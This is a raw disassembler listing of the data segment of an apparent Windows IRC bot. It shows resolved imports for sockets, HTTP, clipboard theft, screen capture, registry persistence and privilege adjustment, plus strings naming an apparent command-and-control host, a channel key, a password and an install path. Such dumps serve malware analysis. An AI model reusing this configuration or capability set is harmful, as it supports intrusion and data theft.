dword_4263C0 dd 74344AE7h ; sub_407087+E80�r
dword_4263C4 dd 74327E4Dh ; sub_407087+E92�r
dword_4263C8 dd 71AB94DCh ; resolved to->WS2_32.WSAGetLastError ; .text:00405670�r ...
dword_4263CC dd 771C6D2Ah ; resolved to->WININET.InternetOpenA ; sub_407087+9FC�r ...
dword_4263D0 dd 77D4B7DBh ; resolved to->USER32.IsWindow ; sub_407087+252�r
dword_4263D4 dd 71AB951Eh ; resolved to->WS2_32.getsockname ; sub_407087+8AB�r ...
dword_4263D8 dd 71AB406Ah ; resolved to->WS2_32.connect ; .text:00402AFD�r ...
dword_4263DC dd 71AB4489h ; resolved to->WS2_32.WSAIoctl ; sub_407087+7CF�r
dword_4263E0 dd 0CC0004h ; sub_407087+A54�r ...
dword_4263E4 dd 77DDEAF4h ; resolved to->ADVAPI32.RegCreateKeyExA ; sub_407087+33C�r ...
dword_4263E8 dd 71ABE479h ; resolved to->WS2_32.gethostbyaddr ; sub_407087+8C6�r ...
dword_4263EC dd 77DFD11Bh ; resolved to->ADVAPI32.LookupPrivilegeValueA ; sub_407087+3B5�r ...
dword_4263F0 dd 743452A3h ; sub_407087+E77�r
dword_4263F4 dd 771C4AC5h ; resolved to->WININET.HttpOpenRequestA ; sub_407087+9E1�r
dword_4263F8 dd 77D4EEF7h ; resolved to->USER32.OpenClipboard ; sub_407087+264�r
dword_4263FC dd 771C44DBh ; resolved to->WININET.InternetConnectA ; sub_407087+9F3�r
dword_426400 dd 71AB2D0Fh ; resolved to->WS2_32.recvfrom ; .text:004056FB�r ...
dword_426404 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKey ; sub_407087+360�r ...
dword_426408 dd 71AB3EA1h ; resolved to->WS2_32.setsockopt ; sub_407087+8A2�r
dword_42640C dd 77DD7753h ; resolved to->ADVAPI32.OpenProcessToken ; sub_407087+3AC�r ...
dword_426410 dd 71AB2DC0h ; resolved to->WS2_32.select ; sub_405369+129�r ...
dword_426414 dd 77F1CE55h ; resolved to->GDI32.CreateDCA ; sub_407087+4D1�r
dword_426418 dd 77D6FCB2h ; resolved to->USER32.GetClipboardData ; sub_407087+26D�r
dword_42641C dd 76F37A65h ; resolved to->DNSAPI.DnsFlushResolverCacheEntry_A ; sub_407087+C32�r
dword_426420 dd 71AB2BC0h ; resolved to->WS2_32.ntohl ; sub_405254+33�r ...
dword_426424 dd 71AB2B66h ; resolved to->WS2_32.ntohs ; .text:00402AD1�r ...
dword_426428 dd 7C863A8Dh ; resolved to->KERNEL32.Process32First ; sub_405D52+10B�r ...
dword_42642C dd 77F158A2h ; resolved to->GDI32.GetDeviceCaps ; sub_407087+4EC�r
dword_426430 dd 77D6F3C6h ; resolved to->USER32.FindWindowA ; sub_407087+249�r ...
dword_426434 dd 5B8A5091h ; sub_407087+BC5�r
dword_426438 dd 71AB50C8h ; resolved to->WS2_32.gethostname ; sub_407087+8B4�r
dword_42643C dd 71AB615Ah ; resolved to->WS2_32.recv ; sub_4016C0+3F0�r ...
dword_426440 dd 74343318h ; sub_407087+E89�r
dword_426444 dd 7C8647B7h ; resolved to->KERNEL32.CreateToolhelp32Snapshot ; sub_405D52+DB�r ...
dword_426448 dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExA ; sub_407087+345�r ...
dword_42644C dd 71AB88D3h ; resolved to->WS2_32.listen ; sub_407087+890�r
dword_426450 dd 71AB3E00h ; resolved to->WS2_32.bind ; sub_407087+6E5�w ...
dword_426454 dd 771C61DCh ; resolved to->WININET.InternetCloseHandle ; sub_407087+A20�r ...
dword_426458 dd 0 ; sub_407087+166�r ...
dword_42645C dd 743527D4h ; sub_407087+E65�r
dword_426460 dd 71AB2BF4h ; resolved to->WS2_32.inet_addr ; .text:00402AE2�r ...
dword_426464 dd 77F19610h ; resolved to->GDI32.CreateDIBSection ; sub_407087+4DA�r
dword_426468 dd 77F16DC0h ; resolved to->GDI32.BitBlt ; sub_407087+507�r
dword_42646C dd 77F15E10h ; resolved to->GDI32.CreateCompatibleDC ; sub_407087+4E3�r
dword_426470 dd 71AB428Ah ; resolved to->WS2_32.send ; sub_4016C0+3B5�r ...
dword_426474 dd 77D4EEE5h ; resolved to->USER32.CloseClipboard ; sub_407087+276�r
dword_426478 dd 5B86ABA1h ; sub_407087+BBC�r
dword_42647C dd 77D4E2AEh ; resolved to->USER32.SendMessageA ; sub_407087+240�r ...
dword_426480 dd 7C822CFBh ; resolved to->KERNEL32.GetDriveTypeA ; sub_407087+125�r
dword_426484 dd 71AB2C69h ; resolved to->WS2_32.sendto ; StartAddress+4C7�r ...
dword_426488 dd 71B2547Ah ; sub_407087+D3B�r
dword_42648C dd 77DFC534h ; resolved to->ADVAPI32.AdjustTokenPrivileges ; sub_407087+3BE�r ...
dword_426490 dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExA ; sub_407087+333�r
dword_426494 dd 7C9FAC27h ; resolved to->SHELL32.SHChangeNotify ; sub_407087+DB1�r
dword_426498 dd 76D6A15Dh ; resolved to->IPHLPAPI.DeleteIpNetEntry ; sub_407087+C9F�r
dword_42649C dd 76D6992Ah ; resolved to->IPHLPAPI.GetIpNetTable ; sub_407087+C96�r
dword_4264A0 dd 71AB3B91h ; resolved to->WS2_32.socket ; .text:0040383F�r ...
dword_4264A4 dd 71AB4FD4h ; resolved to->WS2_32.gethostbyname ; sub_407087+8BD�r ...
dword_4264A8 dd 7432FF6Bh ; sub_407087+E6E�r
dword_4264AC dd 71AB3F41h ; resolved to->WS2_32.inet_ntoa ; sub_404EAD+2B�r ...
dword_4264B0 dd 5B8678B0h ; sub_407087+B8F�r
dword_4264B4 dd 71AC1028h ; resolved to->WS2_32.accept ; sub_407087+899�r
dword_4264B8 dd 71AB9639h ; resolved to->WS2_32.closesocket ; sub_4016C0+341�r ...
dword_4264BC dd 71AB4519h ; resolved to->WS2_32.ioctlsocket ; sub_407087+601�w ...
dword_4264C0 dd 71B2578Ch ; sub_401000+E9�r ...
dword_4264C4 dd 71AB8769h ; resolved to->WS2_32.WSASocketA ; sub_407087+7B5�r
dword_4264C8 dd 71B2517Fh ; sub_407087+D29�r
dword_4264CC dd 7C80AA97h ; resolved to->KERNEL32.SetErrorMode ; sub_407087+EF�r ...
dword_4264D0 dd 77D4E666h ; resolved to->USER32.DestroyWindow ; sub_407087+25B�r
align 8
dword_4264D8 dd 7C826A01h ; resolved to->KERNEL32.SearchPathA ; sub_407087+12E�r ...
dword_4264DC dd 0 ; sub_407087+186�w
dword_4264E0 dd 0 dword_4264E4 dd 0 ; sub_407087+29F�w
dword_4264E8 dd 0 dword_4264EC dd 0 ; resolved to->ADVAPI32.GetUserNameA ; sub_407087:loc_40744E�w ...
dword_4264F0 dd 0 dword_4264F4 dd 0 ; sub_407087+539�w
dword_4264F8 dd 0 dword_4264FC dd 0 ; sub_407087+8EF�w
dword_426500 dd 0 dword_426504 dd 0 ; sub_407087+A71�w ...
dword_426508 dd 0 dd 2 dup(0)
dword_426514 dd 0 ; sub_407087+BE5�w
dword_426518 dd 0 dword_42651C dd 0 ; sub_407087+C52�w
dword_426520 dd 0 dword_426524 dd 0 ; sub_407087+CBF�w
dword_426528 dd 0 dword_42652C dd 0 ; sub_407087+D64�w
dword_426530 dd 0 dword_426534 dd 0 ; sub_407087+DD1�w
dword_426538 dd 0 dword_42653C dd 0 ; sub_407087+EB2�w
dword_426540 dd 0 dd 2 dup(0)
; char byte_42654C[]
byte_42654C db 204h dup(0) ; DATA XREF: sub_40834A+AD�o
; sub_40834A+BA�o
dword_426750 dd 0 ; char Dest[]
Dest db 14h dup(0) ; DATA XREF: sub_40892F+47�o
; sub_40892F+54�o
dword_426768 dd 0 ; char byte_42676C[]
byte_42676C db 38h dup(0) ; DATA XREF: sub_408A81+77�o
; sub_408A81+84�o
dword_4267A4 dd 0 ; char byte_4267A8
byte_4267A8 db 5Bh ; DATA XREF: sub_40913D+2C�r
; sub_40913D+3F�o ...
db 30h, 36h, 2Dh
dd 322D3130h, 20383030h, 353A3131h, 33353A30h, 6E02205Dh
dd 6D1F7A02h, 6928201Fh, 702E6372h, 671F6C1Fh, 0BB022029h
dd 202002BBh, 20746F42h, 72617473h, 2E646574h, 0FF3h dup(0)
dword_42A7B0 dd 0 dword_42A7B4 dd 2 dup(0) dword_42A7BC dd 0 byte_42A7C0 db 0 ; DATA XREF: .text:00409005�r
; .text:0040901C�o ...
align 4
dd 5 dup(0)
dword_42A7D8 dd 2DAh dup(0) ; sub_40909D+51�o ...
byte_42B340 db 2 ; DATA XREF: sub_405759+112�o
; sub_4095D3+225�o ...
db 6Eh, 2, 7Ah
dd 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh, 2BBBB02h
dd 6F422020h, 74732074h, 65747261h, 2E64h, 76h dup(0)
dword_42B540 dd 0 ; sub_4103E7+68�w ...
dword_42B544 dd 0 ; sub_405759+7D�r ...
dword_42B548 dd 0 ; sub_4103E7+88�r ...
dword_42B54C dd 198h ; sub_409C28+C�r ...
dword_42B550 dd 0 ; sub_4103E7+119�w ...
dword_42B554 dd 0 ; sub_404F31+15A�r ...
aUsaXpSp2667553 db 'USA|XP|SP2|667553',0 ; DATA XREF: sub_40A776+CE�o
; sub_410231+9E�w ...
align 4
dd 12BCh dup(0)
dword_43005C dd 55BDh dup(0) dword_445750 dd 0AA60h dup(0)dword_4700D0 dd 4Dh ; sub_40ABFE:loc_40C7FF�r
align 8
dword_4700D8 dd 0 ; char aNeo12_cjb_ne_0[]
aNeo12_cjb_ne_0 db 'neo12.cjb.net',0 ; DATA XREF: WinMain(x,x,x,x)+46F�o
; WinMain(x,x,x,x)+56E�o ...
align 4
dd 1Ch dup(0)
; char aNhg_0[]
aNhg_0 db '#!nhg!#',0 ; DATA XREF: WinMain(x,x,x,x)+48D�o
; WinMain(x,x,x,x)+58C�o ...
dd 0Eh dup(0)
; char aAsdasd_0[]
aAsdasd_0 db 'asdasd',0 ; DATA XREF: WinMain(x,x,x,x)+4A1�o
; WinMain(x,x,x,x)+5A0�o ...
align 4
dd 22h dup(0)
dword_47022C dd 7B9h ; WinMain(x,x,x,x)+580�w ...
dword_470230 dd 0 align 8
dd 1, 0
dword_470240 dd 0 byte_470244 db 0 ; DATA XREF: sub_40A9EB:loc_40AA2E�r
; sub_40A9EB+4E�o
align 4
; char byte_470248
byte_470248 db 0 ; DATA XREF: WinMain(x,x,x,x)+5BF�r
; WinMain(x,x,x,x)+5CC�o
align 4
; char byte_47024C[]
byte_47024C db 4 dup(0) ; DATA XREF: WinMain(x,x,x,x)+5EA�o
; char byte_470250[]
byte_470250 db 4 dup(0) ; DATA XREF: WinMain(x,x,x,x)+5FE�o
dword_470254 dd 0 ; WinMain(x,x,x,x):loc_40A66D�r ...
dword_470258 dd 0 ; sub_40ABFE+A99�r ...
dword_47025C dd 0 ; char byte_470260[]
byte_470260 db 4 dup(0) ; DATA XREF: sub_40ABFE+C46�o
; char byte_470264[]
byte_470264 db 4 dup(0) ; DATA XREF: sub_40ABFE+2BFE�o
; char byte_470268[]
byte_470268 db 8 dup(0) ; DATA XREF: sub_40ABFE:loc_40F3B9�o
dword_470270 dd 0 dword_470274 dd 0 dword_470278 dd 0 byte_47027C db 0 ; DATA XREF: sub_410081:loc_41012C�r
; sub_410081+10E�w
align 10h
dd 2 dup(0)
dword_470288 dd 0 align 10h
dword_470290 dd 0 align 8
word_470298 dw 0 ; DATA XREF: _time+55�r _time+9A�o
word_47029A dw 0 ; DATA XREF: _time+48�r
db 2 dup(0)
word_47029E dw 0 ; DATA XREF: _time+3B�r
word_4702A0 dw 0 ; DATA XREF: _time+2E�r
word_4702A2 dw 0 ; DATA XREF: _time+21�r
align 8
dword_4702A8 dd 0 dword_4702AC dd 0 dword_4702B0 dd 0 ; __read+A5�w ...
dword_4702B4 dd 0 dword_4702B8 dd 0A28h dword_4702BC dd 501h dword_4702C0 dd 5 dword_4702C4 dd 1 dword_4702C8 dd 3 ; __setargv+91�w
dword_4702CC dd 480AA0h ; WinMain(x,x,x,x)+3CC�r ...
dd 0
; void *dword_4702D4
dword_4702D4 dd 480A20h dword_4702D8 dd 0 dword_4702DC dd 0 ; ___wtomb_environ+4�r ...
dd 0
off_4702E4 dd offset aCWindowsNrzi_e ; DATA XREF: __setargv+2E�w
; "C:\\WINDOWS\\Nrzi.exe"
dd 0
byte_4702EC db 0 ; DATA XREF: _doexit+2D�w
; ___endstdio+5�r
align 10h
dword_4702F0 dd 0 dword_4702F4 dd 0 ; void *Memory
Memory dd 0 ; DATA XREF: start+84�w
; __setenvp:loc_417965�r ...
align 10h
dword_470300 dd 0 ; _fast_error_exit�r ...
dword_470304 dd 0 ; _realloc:loc_415A94�r ...
dword_470308 dd 0 dword_47030C dd 0 byte_470310 db 0 ; DATA XREF: __cftoe+3�r __cftoe+98�r ...
align 4
dword_470314 dd 0 byte_470318 db 0 ; DATA XREF: __cftog+51�w
align 4
; void *lp
lp dd 0 ; DATA XREF: FindHandler(EHExceptionRecord *,EHRegistrationNode *,_CONTEXT *,void *,_s_FuncInfo const *,uchar,int,EHRegistrationNode *)+4E�r
; CallCatchBlock(EHExceptionRecord *,EHRegistrationNode *,_CONTEXT *,_s_FuncInfo const *,void *,int,ulong)+3A�r ...
dword_470320 dd 0 ; CallCatchBlock(EHExceptionRecord *,EHRegistrationNode *,_CONTEXT *,_s_FuncInfo const *,void *,int,ulong)+43�r ...
dword_470324 dd 0 ; FindHandlerForForeignException(EHExceptionRecord *,EHRegistrationNode *,_CONTEXT *,void *,_s_FuncInfo const *,int,int,EHRegistrationNode *)+5�r
dword_470328 dd 0 dword_47032C dd 1 ; ___crtLCMapStringA+4C�w ...
dd 2 dup(0)
; LCID dword_470338
dword_470338 dd 0 dd 3 dup(0)
; UINT dword_470348
dword_470348 dd 0 ; _getSystemCP+3A�r ...
align 10h
dword_470350 dd 1 ; _getSystemCP+4�w ...
dword_470354 dd 0 ; __XcptFilter+46�w ...
; char aCWindowsNrzi_e[]
aCWindowsNrzi_e db 'C:\WINDOWS\Nrzi.exe',0 ; DATA XREF: __setargv:loc_417A23�o
; .data:off_4702E4�o
dd 3Ch dup(0)
dword_47045C dd 1 ; ___crtGetEnvironmentStringsA+23�w ...
dword_470460 dd 0 dword_470464 dd 0 word_470468 dw 0 ; DATA XREF: __fltout+1A�o __fltout+46�r
byte_47046A db 0 ; DATA XREF: __fltout+39�r
align 4
dword_47046C dd 7 dup(0) dword_470488 dd 0 dword_47048C dd 0 dword_470490 dd 0 dword_470494 dd 0 ; LPTOP_LEVEL_EXCEPTION_FILTER lpTopLevelExceptionFilter
lpTopLevelExceptionFilter dd 77C2807Ch ; DATA XREF: __CxxUnhandledExceptionFilter(_EXCEPTION_POINTERS *):loc_418A42�r
; __CxxUnhandledExceptionFilter(_EXCEPTION_POINTERS *)+38�r ...
dword_47049C dd 1 ; ___crtGetStringTypeA:loc_418B54�w
dword_4704A0 dd 0 align 8
dword_4704A8 dd 0 align 10h
; struct _TIME_ZONE_INFORMATION TimeZoneInformation
TimeZoneInformation _TIME_ZONE_INFORMATION <0> ; DATA XREF: __tzset+33�o
; __tzset+46�r ...
; void *dword_47055C
dword_47055C dd 0 ; __tzset:loc_419458�r ...
dword_470560 dd 0 dword_470564 dd 0 ; ___crtMessageBoxA+2E�w ...
dword_470568 dd 0 ; ___crtMessageBoxA:loc_4198E7�r
dword_47056C dd 0 ; ___crtMessageBoxA+60�r
dword_470570 dd 0 ; _raise+6D�o
dword_470574 dd 0 ; _raise+44�o
dword_470578 dd 0 ; _raise+37�o
dword_47057C dd 0 ; _raise+51�o
dd 0
dword_470584 dd 0 dword_470588 dd 0 ; ___crtCompareStringA+48�w ...
byte_47058C db 1 ; DATA XREF: sub_403540+3�r
; sub_403540+11�r ...
align 10h
dword_470590 dd 344968h ; __getstream+14�r ...
align 10h
dword_4705A0 dd 400h dup(0) ; .data:00424010�o
; size_t NumOfElements
NumOfElements dd 200h ; DATA XREF: _flsall+9�r _flsall+56�r ...
; UINT CodePage
CodePage dd 4E4h ; DATA XREF: __setmbcp+14�r
; __setmbcp+65�w ...
align 10h
dword_4715B0 dd 3 dup(0) ; __setmbcp+171�o ...
dword_4715BC dd 0 ; __setmbcp+15D�w ...
byte_4715C0 db 0 ; DATA XREF: _setSBUpLow:loc_417658�w
; _setSBUpLow:loc_417675�w ...
align 4
dd 0Fh dup(0)
dd 63626100h, 67666564h, 6B6A6968h, 6F6E6D6Ch, 73727170h
dd 77767574h, 7A7978h, 0
dd 43424100h, 47464544h, 4B4A4948h, 4F4E4D4Ch, 53525150h
dd 57565554h, 5A5958h, 0
dd 83000000h, 0
dd 9A0000h, 9E009Ch, 2 dup(0)
dd 8A0000h, 0FF8E008Ch, 2 dup(0)
dd 0AA0000h, 2 dup(0)
dd 0B500h, 0BA0000h, 0
dd 0E3E2E1E0h, 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h
dd 0F6F5F4h, 0FBFAF9F8h, 0DFFEFDFCh, 0C3C2C1C0h, 0C7C6C5C4h
dd 0CBCAC9C8h, 0CFCECDCCh, 0D3D2D1D0h, 0D6D5D4h, 0DBDAD9D8h
dd 9FDEDDDCh
byte_4716C0 db 0 ; DATA XREF: __setmbcp+5C�o
; __setmbcp+AF�o ...
byte_4716C1 db 0 ; DATA XREF: __splitpath+5D�r
; __setmbcp+A0�w ...
align 4
dd 0Fh dup(0)
dd 10100000h, 6 dup(10101010h), 0
dd 20200000h, 6 dup(20202020h), 2 dup(0)
dd 20h, 10000000h, 10001000h, 2 dup(0)
dd 20000000h, 20002000h, 10h, 0
dd 20000000h, 2 dup(0)
dd 200000h, 20000000h, 0
dd 10101000h, 5 dup(10101010h), 10101000h, 10101010h, 6 dup(20202020h)
dd 20202000h, 20202020h, 20h
; LCID Locale
Locale dd 0 ; DATA XREF: __setmbcp+6E�w
; __setmbcp+12B�w ...
dd 6 dup(0)
dword_4717E0 dd 480EF0h dword_4717E4 dd 3Fh dup(0) ; UINT uNumber
uNumber dd 20h ; DATA XREF: __close+8�r __read+C�r ...
dword_4718E4 dd 10h ; ___sbh_alloc_new_region+5�r ...
dword_4718E8 dd 0 ; ___sbh_free_block+259�r ...
dword_4718EC dd 340650h ; ___sbh_free_block+310�w ...
; void *Dst
Dst dd 0 ; DATA XREF: ___sbh_heap_init:loc_412F0F�w
; ___sbh_free_block+22C�r ...
dword_4718F4 dd 1 ; ___sbh_find_block�r ...
; LPVOID lpMem
lpMem dd 340650h ; DATA XREF: ___sbh_heap_init+15�w
; ___sbh_find_block+8�r ...
; HANDLE hHeap
hHeap dd 340000h ; DATA XREF: __heap_alloc+28�r
; _free+21�r ...
dword_471900 dd 142350h dword_471904 dd 1 dword_471908 dd 1 ; ___initmbctable+11�w ...
dword_47190C dd 480E64h ; __onexit:loc_411A90�r ...
; LPCVOID dword_471910
dword_471910 dd 480E60h align 100h
_data ends
; Section 4. (virtual address 00072000)
; Virtual size : 00000018 ( 24.)
; Section size in file : 00000018 ( 24.)
; Offset to raw data for section: 0006FA00
; Flags C0000240: Data Comment Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_sxdata segment para public 'DATA' use32
assume cs:_sxdata
;org 472000h
dd 127h, 19Ch, 1DCh, 221h, 233h, 290h
align 200h
_sxdata ends
end start